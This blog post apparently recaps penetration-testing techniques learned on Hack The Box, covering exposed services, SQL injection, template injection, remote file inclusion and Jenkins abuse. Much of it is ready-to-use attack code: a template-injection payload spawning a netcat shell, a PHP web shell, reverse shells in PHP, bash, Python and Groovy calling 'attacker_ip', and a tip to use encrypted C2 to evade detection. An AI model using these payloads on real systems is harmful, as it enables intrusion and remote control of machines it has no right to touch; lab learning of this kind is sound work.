ath4rv

Mastering Advanced Hacking Techniques: Lessons from Hack The Box

Introduction

Hack The Box (HTB) offers a structured learning path for penetration testers, gradually taking them from basic enumeration to advanced exploitation techniques. In my journey through HTB, I have tackled machines that challenged me to think beyond simple port scanning and default credential exploits.

This blog will highlight some advanced penetration testing techniques I learned, categorized into two main tiers:
1️⃣ Service Exploitation & Network Attacks
2️⃣ Web Exploitation & Privilege Escalation

Let’s dive into the advanced techniques that every hacker should master. 🚀

1️⃣ Service Exploitation & Network Attacks

🔹 Anonymous Access Exploitation: FTP, SMB, Telnet, Rsync & RDP

One of the first steps in network penetration testing is checking for misconfigured services. Many companies leave services like FTP, SMB, and RDP open to the internet with weak or no authentication.

🛠 Key Exploits:

  • Anonymous FTP Access → Download sensitive files from an exposed FTP server.
  • SMB Null Sessions → Connect to SMB shares without authentication using: bashCopyEditsmbclient -L //<target_ip> -N
  • Telnet with Default Credentials → Weak Telnet configurations allow login as root.
  • Rsync Misconfigurations → Dump files from an open Rsync module.

👉 Lesson Learned: Never allow anonymous access on critical services—attackers will exploit it in seconds!

🔹 Advanced Port Scanning with Nmap

Identifying open ports and running services is crucial before exploitation.

🛠 Key Techniques:

  • Aggressive Service Detection: bashCopyEditnmap -sV -A -Pn <target_ip>
  • Checking for Known Vulnerabilities (Nmap Scripts) bashCopyEditnmap --script vuln <target_ip>

👉 Lesson Learned: Always start with proper enumeration—many attacks fail due to missing details in the scanning phase.

🔹 Exploiting Exposed MongoDB Servers

Misconfigured MongoDB databases are a goldmine for attackers. If a server is publicly accessible, an attacker can simply connect and extract sensitive data.

🛠 Key Exploits:

  • Check for open MongoDB access: bashCopyEditmongo --host <target_ip> --port 27017
  • List all available databases: bashCopyEditshow dbs

👉 Lesson Learned: Never expose databases directly to the internet! Use authentication and firewall rules.

2️⃣ Web Exploitation & Privilege Escalation

🔹 SQL Injection (SQLi) for Database Takeover

SQL injection is a classic attack that allows attackers to extract database information and even gain remote access.

🛠 Key Exploits:

  • Simple ‘ OR 1=1 — authentication bypass
  • Extracting databases via SQL injection: sqlCopyEditUNION SELECT null, database(), user()

👉 Lesson Learned: Always sanitize inputs and use prepared statements to prevent SQL injection!

🔹 Server-Side Template Injection (SSTI) to Gain RCE

Many modern web apps use templating engines like Jinja2, Twig, or PugJS. Improper use can allow remote code execution (RCE).

🛠 Key Exploit:

  • Python SSTI in Flask/Jinja2: jinjaCopyEdit{{ self.__class__.__mro__[2].__subclasses__()[40]('/bin/bash -c "nc -e /bin/sh <attacker_ip> 4444"',shell=True,stdout=-1,stderr=-1,stdin=-1).communicate() }}

👉 Lesson Learned: Web apps must properly validate template inputs to prevent execution of arbitrary code.

🔹 Remote File Inclusion (RFI) for Code Execution

If a web server allows users to include external files, attackers can execute arbitrary scripts.

🛠 Key Exploit:

  • Injecting a malicious PHP shell: phpCopyEdit<?php system($_GET['cmd']); ?>
  • Hosting the file on a remote server: bashCopyEditpython3 -m http.server 8080
  • Triggering the execution via: bashCopyEdithttp://target.com/vulnerable.php?file=http://attacker.com/shell.php

👉 Lesson Learned: File inclusions should only allow safe, whitelisted files.

🔹 Reverse Shells & Web Shells

Gaining initial access is great, but persistence requires a reverse shell.

🛠 Key Exploits:

  • PHP Reverse Shell: phpCopyEdit<?php $sock=fsockopen("attacker_ip",4444);exec("/bin/sh -i <&3 >&3 2>&3"); ?>
  • Bash Reverse Shell: bashCopyEditbash -i >& /dev/tcp/attacker_ip/4444 0>&1
  • Python Reverse Shell: pythonCopyEditimport socket,subprocess,os s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(("attacker_ip",4444)) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) p=subprocess.call(["/bin/sh","-i"])

👉 Lesson Learned: Reverse shells are often detected—use encrypted C2 frameworks like Metasploit or Covenant!

🔹 Exploiting Jenkins for Privilege Escalation

Jenkins, a widely used automation server, often runs with high privileges.

🛠 Key Exploit:

  1. Log in to Jenkins (default credentials often work).
  2. Upload a Groovy shell script: groovyCopyEditdef proc = "bash -c 'bash -i >& /dev/tcp/attacker_ip/4444 0>&1'".execute() proc.waitFor()
  3. Gain a reverse shell as a high-privilege user.

👉 Lesson Learned: Always restrict Jenkins to authorized users & remove unnecessary plugins.

Final Thoughts

HTB machines simulate real-world vulnerabilities, and the techniques I’ve learned apply directly to penetration testing engagements.

🔥 Key Takeaways:
Enumeration is key—Most attacks fail due to incomplete recon.
Misconfigured services = easy targets—FTP, SMB, MongoDB, and Jenkins are often vulnerable.
Web exploits lead to remote code execution—SQLi, SSTI, and RFI can be devastating.
Always secure authentication—Weak credentials make privilege escalation too easy.

💡 What advanced exploitation techniques have you learned from HTB? Drop a comment below!

Leave a Reply

Your email address will not be published. Required fields are marked *